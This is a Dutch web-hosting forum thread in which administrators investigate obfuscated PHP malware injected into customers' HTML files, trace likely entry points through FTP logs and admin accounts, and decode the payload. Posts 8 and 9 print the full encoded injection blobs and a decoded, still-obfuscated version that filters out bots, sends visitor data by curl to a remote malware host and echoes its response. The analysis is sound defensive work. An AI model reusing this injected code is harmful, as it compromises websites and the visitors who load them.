Likes Likes:  0
Resultaten 1 tot 14 van de 14
Geen
  1. #1
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter

    Base64 hacks in html files

    Ik heb al de nodige base64 decoders online gevonden, maar ik krijg het niet voor elkaar om de code te decoderen.
    Vermoedelijk omdat hij compressed is.
    Het rare is dat die code zich uitsluitend in een aantal html files bevindt maar het komt momenteel voor in een aantal accounts op een drietal servers. Uitsluitend in html.

    Alles staat op 1 regel. Dit is een stukje van het begin:
    Code:
    <?php eval(gzuncompress(base64_decode('eF59ktFrwjAQxv+VPQyiMIa0UyijD/pgRQSxDm0iUkxShBpRLAz
    En een stukje verder zie je dan zoiets:
    Code:
    49dvN1USdQ5o6/3PH6GR3cE='))); ?><?php eval(gzuncompress(base64_decode('eF5tUF1rgzAU/St7ENrCHjRdx6T0oW
    Hetgaan aangeeft dat de ene phpcode eindigt en de volgende weer begint.

    Iemand een idee hoe/waar dit wel te ontcijferen is en hoe dit in die html bestanden komt?

    En iemand een idee hoe het er op komt? Want ik heb middels een grep commando de logfiles nagespit maar kan zo vlug niets over de aanpassing vinden. Dus als iemand een idee heeft hoe het in de logfile kan staan of waar het vandaan kan komen hoor ik het graag.
    Alle 3 deze servers draaien Centos 2.6.32-358.18.1.el6.x86_64, php 5.3.27 en mysql 5.5.34 met apache 2.2.25 en mod_ruid2 0.9.8.

  2. #2
    Base64 hacks in html files
    geregistreerd gebruiker
    701 Berichten
    Ingeschreven
    10/12/08

    Locatie
    's-Hertogenbosch

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    19 Berichten zijn liked


    Naam: Boy
    Registrar SIDN: nee
    KvK nummer: 52000885
    Ondernemingsnummer: nvt

    Ook al in de FTP log gekeken?

  3. #3
    Base64 hacks in html files
    geregistreerd gebruiker
    71 Berichten
    Ingeschreven
    10/08/13

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    6 Berichten zijn liked


    Naam: Mark Lak

    Komt vaak door een exploit in populaire software als Wordpress, Drupal, etc Als je eval() vervangt door die() kan je de code zien als het goed is, maar ik denk dat deze weer een paar keer verborgen is. Kost dus even wat tijd om te achterhalen welke vreemde code geinjecteerd is.

    Zoals Boyke zegt, FTP gegevens kunnen heel makkelijk achterhaald worden door virussen op je pc (ook al sla je het wachtwoord niet op).
    Laatst gewijzigd door ozeik; 20/10/13 om 10:21.

  4. #4
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    De ftp log was het eerste waar ik in gekeken heb, maar ik weet niet precies waar op te zoeken. Eerst heb ik naar counter.php gezocht, daar waren er een aantal van geinfecteerd. Maar achteraf bleek dat weinig zin te hebben gehad, aangezien die middelse en iframe er in gekomen zijn.
    Dus ben ik gaan zoeken op een domeinnaam. Maar er staan in de FTP log van gisteren slechts enkele vermeldingen, en daaronder zit niet de betreffende domeinen.

    Ook ik was al aan het denken aan malware op een thuispc, want meestal worden zo wachtwoorden gestolen en die zooi er op gezet. Maar van minimaal een gebruiker weet ik dat hij de pc zeer goed in de gaten houdt, up2date virusscanner en regelmatige scans met malware bytes, adwclear en recent nog combofix.
    Van een tweede site op een andere server bleek dat die niet eens in gebruik was. De domeinnaam was wel actief, maar op de server waren uitsluitend de bestanden aanwezig die je krijgt als je met DA een account aanmaakt. Daar was dan ook alleen de index.html geinfecteerd.

    Van eentje heb ik inmiddels de oorzaak achterhaald. Die had een of andere dingens voor wordpress, heette moviereview.zip en in die zip zat een reeds geinfecteerde footer.php.

    Het is een geluk dat wij op alle servers Maldet hebben draaien. Dus ik werd vannacht middels emails van de scan op de hoogte gesteld en de filedatums waren van 19 oktober 22.33 uur (gisteren dus), toen zijn ze geinfecteerd. Vannacht om 05.00 uur was de laatste infectie al weer verwijderd. Ze zijn daardoor gelukkig slechts enkele uren actief geweest en ook late uren.
    Maarja, dat helpt weinig want als je niet achter de oorzaak komt, kan het opnieuw gebeuren.

    Met name die infectie van dat standaard aangemaakte account waar nog niets op geinstalleerd was verbaast me toch wel enigszins.

    Als iemand denkt dat hij die base64 code kan kraken wil ik hem best online kiepen, het is niet zo heel veel.
    Laatst gewijzigd door Blacky; 20/10/13 om 15:34.

  5. #5
    Base64 hacks in html files
    Programmeur / Hoster
    3.952 Berichten
    Ingeschreven
    20/06/06

    Locatie
    Wijlre

    Post Thanks / Like
    Mentioned
    28 Post(s)
    Tagged
    0 Thread(s)
    647 Berichten zijn liked


    Naam: John Timmer
    Bedrijf: SystemDeveloper.NL
    Functie: Eigenaar
    URL: www.systemdeveloper.nl
    KvK nummer: 14083066
    View johntimmer's profile on LinkedIn

    base64 'kraken'...

    Zoals al gezegd is, verander de 'eval', 'die' en je hebt de phpcode die uitgevoerd wordt.
    Misschien dat je daarna nog iets verder moet spitten.

    En als eerste natuurlijk even duidelijk krijgen:

    - heb je ze gevonden onder 1 account, meerdere of alle? Bij 1 kun je kijken naar ftplogs en weblogs van die sites. Bij meerdere en 1 reseller, is wellicht die reseller zijn account gehackt en kun je je daarop richten. Bij alle kun je eens goed naar je eigen 'admin' account kijken en bv. de da-logs erbij trekken.
    - runnen scripts onder apache/root of het uid van de owner? Misschien nog iets in je mod_ruid logs te vinden.
    - wat zijn de overeenkomsten tussen beide servers? Kijk naar software, setup, rechten, tijdstippen/ip's van uploads via ftp, admin/root passwords, overeenkomstige users, recente brute-forces e.d.
    - vergelijk eventueel de domeinen/users met die uit een backups.

    Binnen een uurtje kun je dan normaal gesproken wel wat meer duidelijkheid hebben en bepalen of een user of een server gecompromiteerd is (bv, admin account van da) en wat je dan moet doen.
    Ook kun je de backups van de betreffende servers even apart houden zodat ze niet 'weg' roteren.

    Maar remote klanten moet je nooit 'vertrouwen' en moet je securitywise altijd als gewoon risicovol access zien tenzij ze een autorisatie process hebben doorlopen. Dus sla die niet over in je gespit door de logs. Tegen een nieuwe trojan of virus doet je virusscanner en malwarebytes precies niks.
    Laatst gewijzigd door systemdeveloper; 20/10/13 om 20:16.
    SystemDeveloper.NL - 64BitsWebhosting.EU : Softwareontwikkeling & Hosting freaks

  6. #6
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    Ik zal eens proberen, maar moet ik die dan als php file uitvoeren of dat "die" daar neerzetten en dan door een online base64 decoder halen?

    Ik heb ze gevonden bij meerdere accounts op 3 verschillende servers.
    De ftplogs was niets te vinden. De weblogs zou ik nog eens kunnen gaan kijken of ik daar iets kan zien. Op 1 server ging het overigens ook om het admin account.

    Er draait mod_ruid2 op alle servers dus als het goed is draaien er geen scripts onder apache en zeker niet onder root. Misschien wel als owner. Maarreh... volgens mij zijn er geen mod_ruid logs, waar zouden die moeten staan?
    [root@server15: ~]# locate mod_ruid
    /usr/lib/apache/mod_ruid2.so
    /usr/local/src/mod_ruid2-0.9.8
    /usr/local/src/mod_ruid2-0.9.8.tar.bz2
    /usr/local/src/mod_ruid2-0.9.8/.libs
    /usr/local/src/mod_ruid2-0.9.8/LICENSE
    /usr/local/src/mod_ruid2-0.9.8/README
    /usr/local/src/mod_ruid2-0.9.8/contrib
    /usr/local/src/mod_ruid2-0.9.8/mod_ruid2.c
    /usr/local/src/mod_ruid2-0.9.8/mod_ruid2.la
    /usr/local/src/mod_ruid2-0.9.8/mod_ruid2.lo
    /usr/local/src/mod_ruid2-0.9.8/mod_ruid2.o
    /usr/local/src/mod_ruid2-0.9.8/mod_ruid2.slo
    /usr/local/src/mod_ruid2-0.9.8/ruid2.conf
    /usr/local/src/mod_ruid2-0.9.8/.libs/mod_ruid2.a
    /usr/local/src/mod_ruid2-0.9.8/.libs/mod_ruid2.la
    /usr/local/src/mod_ruid2-0.9.8/.libs/mod_ruid2.lai
    /usr/local/src/mod_ruid2-0.9.8/.libs/mod_ruid2.o
    /usr/local/src/mod_ruid2-0.9.8/.libs/mod_ruid2.so
    /usr/local/src/mod_ruid2-0.9.8/contrib/mod_ruid2-redhat.spec
    De overeenkomsten tussen alle 3 de servers is eigenlijk alles behalve hardware en passwords. Zelfde OS, zelfde Directadmin, zelfde apache, php, mysql versies etc. alles wordt continue volledig up2date gehouden. Nja php is wel nog 5.3 maar daarvan dan wel de laatste nieuwe versie. Op die manier dus.

    Tijdstippen durf ik nu niet meer te zeggen, verschillende users, bruteforces zijn er elke dag hopen, met name van China en met name op mail. CSF/LFD vangt dat netjes af al wordt ik soms gek van de mail notificaties van die bruteforces. Maar ik schakel die notificaties niet uit, dan weet ik ook wat er speelt wat betreft.

    Geen enkele klant heeft bij ons SSH toegang en ook poort 3306 van mysql staat bijv. gewoon lekker dicht. Dus we zijn al erg voorzichtig met remote dingetjes. SSH is overigens uitsluitend voor mij toegankelijk en zelfs dan alleen via SSH keys.

    Bedankt voor de tips in elk geval.

  7. #7
    Base64 hacks in html files
    geregistreerd gebruiker
    1.555 Berichten
    Ingeschreven
    20/07/10

    Locatie
    's-Gravenhage

    Post Thanks / Like
    Mentioned
    20 Post(s)
    Tagged
    0 Thread(s)
    308 Berichten zijn liked



    Citaat Oorspronkelijk geplaatst door Blacky Bekijk Berichten
    ....
    Als iemand denkt dat hij die base64 code kan kraken wil ik hem best online kiepen, het is niet zo heel veel.
    Ik wil wel even kijken.
    De base64 decode is simpel, en de uitkomst ervan is blijkbaar met zlib gecompressed.
    Dat is gzip zonder headers, en moet je dan nog decompressen.

  8. #8
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    Dit heeft vrijwel alle overeenkomsten:
    http://www.jexanalytics.com/2012/02/...es-all-hacked/

    Alleen heeft dit euvel zich niet alleen in wordpress sites afgespeeld maar ook gewone html sites.
    Op een of andere wijze hebben ze een ftpchk3.php online gekregen en die is nadien verwijderd. Volgens mij logt pureftd niet alles want daar is gewoon niets hierover in terug te vinden, noch in de sitenamen van de sites.
    Ook vind ik die logs vrij waardeloos qua date/time aanduiding dus ik denk dat we maar teruggaan naar proftpd alhoewel ik pureftpd beter vind.
    Op 1 server was dit de veroorzaker 192.157.246.90 en op een andere server dit ip 192.30.86.226.

    Even kijken. Hier is ie:
    Code:
    <?php eval(gzuncompress(base64_decode('eF59ktFrwjAQxv+VPQyiMIa0UyijD/pgRQSxDm0iUkxShBpRLAzav379rroNkvhyl/Z++e67I6/JYjkZL9Y7lpuc7ePx7
    Xaoe/JQFaOPXBfqooseUyF7eWdprZMIh0qG2qhjHLP+m0WmNRAVttmuooQKEZ2mg2oJ9SBtDVTd6lQhVQRv/65vq+Gj/nS8Gl4Pd9/+6QDw8xSpEV98kOEUkBfDg+gkVq69a
    sLmlUDaIgxL+e+mvUWdzSsAYtuSQWrchHhoPSGGJXTcGjzc1HJKr+IqzzQEwsDuht9E40Dj062GJsrSbzVbOd7TXb8BJJ5QqJMTUyQbfJS2A05v49dvN1USdQ5o6/3PH6GR3
    cE='))); ?><?php eval(gzuncompress(base64_decode('eF5tUF1rgzAU/St7ENrCHjRdx6T0oWXG6jC00SSaMYZRh7Z+4WptO/bfZ2xhDxsEzrk3955zuB9tGR2yqr
    zLx0o2+VLCxbJpwvN45EJMCNQpUanrq3CNyYyM7kf940A/cnDKe5owWAnwtOhpUMCar4mkwkethOkqjwpj+ATpWQBNrgRF3vJuIbsRgEXg2/XQ1dUeyJ4iT8OwNzQwtOTQLY
    flaUj6ByR1HRMZYsodR7VOjGkvcYEtb7fiDNpdcEFuBPMZYnXm7FZA1qGJIfH5ztHsihuOFgNobT1Vqm9A3m22Q5p/vO2SXrhvpxzQNn4eFuwCHwWDtShmqWBE/5vQLrgmzF
    MX+Lj6lcaUUI/Ke+73Vx1UcYaa24Qw9WN4vYp3BWvZp5rMm+TQNuWdCD+Tx4f3OImqOBkr4auSvU3m3z9hI4Pp'))); ?><?php  eval(gzuncompress(base64_decode
    ('eF59lF1rgzAUhv+KhWITWoqJ2g8k0G64MnDtSHU3ItJtdiuEFfpxVfzvO0m1KaZ4ocHwnDfkvO9xt0Wd3fFYnFBXiNzB+PIj9p8bYanPQL3ZYX/++0ZOn2C1QVh3Ea2e5t
    E67eUi72Wpk6Fuvg75R8hTgRycXUHKlkkUqRqXCQTluy1CzWICxVJ1IBDFmDFruxHHAtu2QVJNuu2kq0mvnfQ06beTviZH7eRIk+N2cqzJSTs50eS0nZxqkoCht4biC3S/8l
    qbRQi4BczpcC4s27ZMgGoAX65eGhZCAMBfMMUawurBYiDS5rtjfVBV8OgRXDt9RcaPEGnxnd6k1ps+gqXLGqYyofJwSmCpb7wIYwgvldcNZvKe1Mg5qTLg4qAsoZuKsjrQPh
    l06E5jLkiVBDp4Tni0eo9zHsYJX8Z8vly/hHxQT5YzpP3Gg2GGmnJVXLRc/PoWrpL4pgMhUuPmsZlRXCWIqilUUFodjzMG40nBPuXv/T5sezgovn736o/gBaWhW+UNdMvyH7
    ajNC4='))); ?>

  9. #9
    Base64 hacks in html files
    geregistreerd gebruiker
    1.555 Berichten
    Ingeschreven
    20/07/10

    Locatie
    's-Gravenhage

    Post Thanks / Like
    Mentioned
    20 Post(s)
    Tagged
    0 Thread(s)
    308 Berichten zijn liked



    Citaat Oorspronkelijk geplaatst door Blacky Bekijk Berichten
    Dit heeft vrijwel alle overeenkomsten:
    http://www.jexanalytics.com/2012/02/...es-all-hacked/

    Alleen heeft dit euvel zich niet alleen in wordpress sites afgespeeld maar ook gewone html sites.
    Op een of andere wijze hebben ze een ftpchk3.php online gekregen en die is nadien verwijderd. Volgens mij logt pureftd niet alles want daar is gewoon niets hierover in terug te vinden, noch in de sitenamen van de sites.
    Ook vind ik die logs vrij waardeloos qua date/time aanduiding dus ik denk dat we maar teruggaan naar proftpd alhoewel ik pureftpd beter vind.
    Op 1 server was dit de veroorzaker 192.157.246.90 en op een andere server dit ip 192.30.86.226.

    Even kijken. Hier is ie:
    Code:
    <?php eval(gzuncompress(base64_decode('eF59ktFrwjAQxv+VPQyiMIa0UyijD/pgRQSxDm0iUkxShBpRLAzav379rroNkvhyl/Z++e67I6/JYjkZL9Y7lpuc7ePx7
    Xaoe/JQFaOPXBfqooseUyF7eWdprZMIh0qG2qhjHLP+m0WmNRAVttmuooQKEZ2mg2oJ9SBtDVTd6lQhVQRv/65vq+Gj/nS8Gl4Pd9/+6QDw8xSpEV98kOEUkBfDg+gkVq69a
    sLmlUDaIgxL+e+mvUWdzSsAYtuSQWrchHhoPSGGJXTcGjzc1HJKr+IqzzQEwsDuht9E40Dj062GJsrSbzVbOd7TXb8BJJ5QqJMTUyQbfJS2A05v49dvN1USdQ5o6/3PH6GR3
    cE='))); ?><?php eval(gzuncompress(base64_decode('eF5tUF1rgzAU/St7ENrCHjRdx6T0oWXG6jC00SSaMYZRh7Z+4WptO/bfZ2xhDxsEzrk3955zuB9tGR2yqr
    zLx0o2+VLCxbJpwvN45EJMCNQpUanrq3CNyYyM7kf940A/cnDKe5owWAnwtOhpUMCar4mkwkethOkqjwpj+ATpWQBNrgRF3vJuIbsRgEXg2/XQ1dUeyJ4iT8OwNzQwtOTQLY
    flaUj6ByR1HRMZYsodR7VOjGkvcYEtb7fiDNpdcEFuBPMZYnXm7FZA1qGJIfH5ztHsihuOFgNobT1Vqm9A3m22Q5p/vO2SXrhvpxzQNn4eFuwCHwWDtShmqWBE/5vQLrgmzF
    MX+Lj6lcaUUI/Ke+73Vx1UcYaa24Qw9WN4vYp3BWvZp5rMm+TQNuWdCD+Tx4f3OImqOBkr4auSvU3m3z9hI4Pp'))); ?><?php  eval(gzuncompress(base64_decode
    ('eF59lF1rgzAUhv+KhWITWoqJ2g8k0G64MnDtSHU3ItJtdiuEFfpxVfzvO0m1KaZ4ocHwnDfkvO9xt0Wd3fFYnFBXiNzB+PIj9p8bYanPQL3ZYX/++0ZOn2C1QVh3Ea2e5t
    E67eUi72Wpk6Fuvg75R8hTgRycXUHKlkkUqRqXCQTluy1CzWICxVJ1IBDFmDFruxHHAtu2QVJNuu2kq0mvnfQ06beTviZH7eRIk+N2cqzJSTs50eS0nZxqkoCht4biC3S/8l
    qbRQi4BczpcC4s27ZMgGoAX65eGhZCAMBfMMUawurBYiDS5rtjfVBV8OgRXDt9RcaPEGnxnd6k1ps+gqXLGqYyofJwSmCpb7wIYwgvldcNZvKe1Mg5qTLg4qAsoZuKsjrQPh
    l06E5jLkiVBDp4Tni0eo9zHsYJX8Z8vly/hHxQT5YzpP3Gg2GGmnJVXLRc/PoWrpL4pgMhUuPmsZlRXCWIqilUUFodjzMG40nBPuXv/T5sezgovn736o/gBaWhW+UNdMvyH7
    ajNC4='))); ?>
    Eerste resultaat, en dat is verder obfuscated.
    PHP doe ik niet zo veel mee, dus nu alvast een tussenstand.

    Het decoden heb ik op de commandline gedaan;
    Het waren drie base64 strings, die ik in drie aparte filetjes gesaved heb.

    uncompressen met base64 -d , en de zlib decompressie zit (oa) ook in openssl.
    base64 -d tmp.b64.1 | openssl zlib -d >tmp.b64.1.zlib.uncompressed.
    (etc)

    $GLOBALS['_l_']=Array(base64_decode('c3' .'RydG9' .'sb3dlcg=='),base64_decode('c3Ry' .'c3Ry'),base64_decode('c' .'3Ry' .'c3' .'Ry'),base64_decode('c3Ryc' .'3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c 3Ryc3' .'R' .'y'),base64_decode('c' .'3' .'Ryc3R' .'y'),base64_decode('c3Ryc3' .'Ry'),base64_decode('c' .'3Ryc3Ry'),base64_decode('c' .'3Ryc3' .'Ry'),base64_decode('' .'YmF' .'zZTY0X' .'2R' .'lY29kZQ=='),base64_decode('dX' .'JsZ' .'W' .'5jb' .'2R' .'l'),base64_decode('dXJs' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2Rl'),base64_decode('dXJsZW5j' .'b2Rl'),base64_decode('Y3VybF9' .'pbm' .'l' .'0'),base64_decode('' .'Y3Vyb' .'F' .'9' .'zZ' .'XRvcHQ='),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3' .'VybF9leGV' .'j'),base64_decode('Y3' .'VybF9' .'j' .'bG9zZ' .'Q=='));

    function l($i){$a=Array('SFRUUF9VU0VSX0FHRU5U','','Z29vZ2xl ','eWFob28=','YmFpZHU=','bXNu','b3BlcmE=','Y2hyb21 l','YmluZw==','c2FmYXJp','Ym90','UkVNT1RFX0FERFI=' ,'SFRUUF9IT1NU','YUhSMGNEb3ZMM0IxWW1KdmRITjBZWFJwY zNScFl5NWpiMjB2YzNSaGRFUXZjM1JoZEM1d2FIQT0=','P2lw PQ==','UkVNT1RFX0FERFI=','JnVzZXJhZ2VudD0=','JmRvb WFpbm5hbWU9','SFRUUF9IT1NU','JmZ1bGxwYXRoPQ==','Uk VRVUVTVF9VUkk=','JmNoZWNrPQ==','bG9vaw==','Tw==',' IA==');return base64_decode($a[$i]);}

    if(!isset($ll_0)){global $ll_0;$ll_0=round(0+1);$ll_1=$GLOBALS['_l_'][0]($_SERVER[l(0)]);$ll_2=NULL;$ll_3=l(1);if(($GLOBALS['_l_'][1]($ll_1,l(2))== false)&&($GLOBALS['_l_'][2]($ll_1,l(3))== false)&&($GLOBALS['_l_'][3]($ll_1,l(4))== false)&&($GLOBALS['_l_'][4]($ll_1,l(5))== false)&&($GLOBALS['_l_'][5]($ll_1,l(6))== false)&&($GLOBALS['_l_'][6]($ll_1,l(7))== false)&&($GLOBALS['_l_'][7]($ll_1,l(8))== false)&&($GLOBALS['_l_'][8]($ll_1,l(9))== false)&&($GLOBALS['_l_'][9]($ll_1,l(10))== false)){if(isset($_SERVER[l(11)])== true && isset($_SERVER[l(12)])== true){$ll_3=$GLOBALS['_l_'][10](l(13)) .l(14) .$GLOBALS['_l_'][11]($_SERVER[l(15)]) .l(16) .$GLOBALS['_l_'][12]($ll_1) .l(17) .$GLOBALS['_l_'][13]($_SERVER[l(18)]) .l(19) .$GLOBALS['_l_'][14]($_SERVER[l(20)]) .l(21) .isset($_GET[l(22)]);@$ll_2=$GLOBALS['_l_'][15]($ll_3);}}if($ll_2 !== NULL){$GLOBALS['_l_'][16]($ll_2,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+ 0.2+0.2));$GLOBALS['_l_'][17]($ll_2,CURLOPT_TIMEOUT,round(0+8));$ll_4=@$GLOBALS['_l_'][18]($ll_2);if($ll_4[round(0)]==l(23)){$ll_4[round(0)]=l(24);echo $ll_4;}$GLOBALS['_l_'][19]($ll_2);}}

  10. #10
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    Oh dat eerste stukje komt me bekend voor, dat had ik op een of andere manier zover ook al klaar gekregen in een online base64 decoder waar je php infected files mee kon decoderen.
    Alleen begrijp ik nu nog steeds geen bal van wat het doet. Maarja op zich is dat niet erg, het is een stukje malware.
    Hoe dan ook toch bedankt voor dit deel, is toch wel weer interessant.

    Inmiddels heb ik pure-ftpd op alle servers gerecompiled met de --with-altlog optie en een aparte xferlog erbij laten aanmaken, want er moet gewoon iets via ftp gebeurt zijn wat niet te zien is, dus hopelijk helpt dat. En anders gaan we terug naar proftpd.

  11. #11
    Base64 hacks in html files
    geregistreerd gebruiker
    1.555 Berichten
    Ingeschreven
    20/07/10

    Locatie
    's-Gravenhage

    Post Thanks / Like
    Mentioned
    20 Post(s)
    Tagged
    0 Thread(s)
    308 Berichten zijn liked



    Citaat Oorspronkelijk geplaatst door Blacky Bekijk Berichten
    Oh dat eerste stukje komt me bekend voor, dat had ik op een of andere manier zover ook al klaar gekregen in een online base64 decoder waar je php infected files mee kon decoderen.
    Alleen begrijp ik nu nog steeds geen bal van wat het doet. Maarja op zich is dat niet erg, het is een stukje malware.
    Hoe dan ook toch bedankt voor dit deel, is toch wel weer interessant.

    Inmiddels heb ik pure-ftpd op alle servers gerecompiled met de --with-altlog optie en een aparte xferlog erbij laten aanmaken, want er moet gewoon iets via ftp gebeurt zijn wat niet te zien is, dus hopelijk helpt dat. En anders gaan we terug naar proftpd.
    Met een tijdje lezen en her-formatteren denk ik dat de code het volgende doet :

    De eerste strings is een array met strtolower, strstr (herhaald), base64_decode, urlencode (herhaald) , curl_init , curl_setopt, curl_exec,curl_close.

    De tweede string een array van strings met matchwoords en een base64 encoded url.

    En de derde is het programma , dat zich opbouwt door de eerste twee arrays te gebruiken.

    Als ik het goed las, doet het programma ongeveer dit :

    if user_agent is not (google/yahoo/opera/safari/bing/bot ... )
    then
    if remote_addr en http_host bekend
    curl_init (url van pubbotXXXX , ?ip= .. &user agent &domainname ....
    curl_setopt
    culr_setopt
    curl_exec


    Ik denk dat de bezoeker dan een webpagina krijgt van de malware server .

  12. #12
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    Interessant! Ik vind het toch knap. Moet je toch wel het een en ander van coden weten om dat zo te kunnen achterhalen.
    if user_agent is not (google/yahoo/opera/safari/bing/bot... )
    Dus op die manier filteren ze de zoekmachine bots er uit en de rest wordt verder geleid als ik het goed begrijp.

    Nu zien of ze het nog eens proberen. Betreffende gebruikers zijn in elk geval gewaarschuwt om te cleanen en wachtwoorden te wijzigen.

  13. #13
    Base64 hacks in html files
    Programmeur / Hoster
    3.952 Berichten
    Ingeschreven
    20/06/06

    Locatie
    Wijlre

    Post Thanks / Like
    Mentioned
    28 Post(s)
    Tagged
    0 Thread(s)
    647 Berichten zijn liked


    Naam: John Timmer
    Bedrijf: SystemDeveloper.NL
    Functie: Eigenaar
    URL: www.systemdeveloper.nl
    KvK nummer: 14083066
    View johntimmer's profile on LinkedIn

    Maak voor de gein ook eens 2 lege testaccounts aan (wel met domeintje) en hou die ook eens in de gaten.
    DA's standaard random passwords zijn dan niet zo geweldig maar je ziet zelden dat er op 3 servers van 1 partij opeens een hoop accounts zijn gekraakt, puur op basis van die accounts zelf.
    Meestal is dan ook wel een admin password verkeerd terecht gekomen. En 'admin' op da is eigenlijk hetzelfde als 'root'.
    Wellicht kun je nog een lijstje maken van alle bestanden die zijn gewijzigd op de dag dat het scriptje gevonden werd door maldet.
    Gewoon om zeker te zijn dat er geen geintjes in je sbin/bin/etc/e.d. zijn achtergelaten.
    SystemDeveloper.NL - 64BitsWebhosting.EU : Softwareontwikkeling & Hosting freaks

  14. #14
    Base64 hacks in html files
    geregistreerd gebruiker
    1.626 Berichten
    Ingeschreven
    18/06/04

    Locatie
    Maastricht

    Post Thanks / Like
    Mentioned
    6 Post(s)
    Tagged
    0 Thread(s)
    26 Berichten zijn liked


    KvK nummer: 14101842

    Thread Starter
    Ik heb op 2 servers sowieso nog test accounts van mezelf staan, daar is niets mee gebeurt. Dat is op 1 server een reseller account en op een andere server een paar prive accountjes.
    De servers worden niet door mij gehuurd, ik doe met name het onderhoud en heb daarom ook admin en root toegang en mag er uiteraard ook accounts op zetten.
    Wellicht kun je nog een lijstje maken van alle bestanden die zijn gewijzigd op de dag dat het scriptje gevonden werd door maldet.
    Met grep of find op filedate zoeken ofzo?

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics